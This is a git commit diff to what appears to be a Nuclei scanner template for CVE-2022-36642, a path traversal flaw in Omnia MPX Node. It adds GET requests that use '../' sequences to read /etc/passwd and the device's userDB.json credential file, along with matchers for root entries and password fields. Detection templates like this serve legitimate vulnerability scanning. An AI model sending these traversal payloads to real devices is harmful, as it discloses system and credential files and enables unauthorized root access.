merg with `omnia-mpx-lfi`

2022-09-04 19:22:42 +05:30 · 2022-09-04 19:22:42 +05:30 · 4fb9cd69ed
parent 359402b84b
commit 4fb9cd69ed
2 changed files with 10 additions and 9 deletions
--- a/cves/2022/CVE-2022-36642.yaml
+++ b/cves/2022/CVE-2022-36642.yaml
@ -2,7 +2,7 @@ id: CVE-2022-36642

 info:
  name: Omnia MPX 1.5.0+r1 - Path Traversal
-  author: For3stCo1d
+  author: arafatansari,ritikchaddha,For3stCo1d
  severity: high
  description: |
    A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
@ -20,20 +20,21 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../../../../../config/MPXnode/www/appConfig/userDB.json"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"

-    matchers-condition: and
+    stop-at-first-match: true
+    matchers-condition: or
    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
      - type: word
        part: body
        words:
          - '"username":'
          - '"password":'
-          - '"displayName":'
          - '"mustChangePwd":'
-          - '"hasChangePwd":'
+          - '"roleUser":'
        condition: and
-
-      - type: status
-        status:
-          - 200
--- a/vulnerabilities/other/omnia-mpx-lfi.yaml
+++ b/vulnerabilities/other/omnia-mpx-lfi.yaml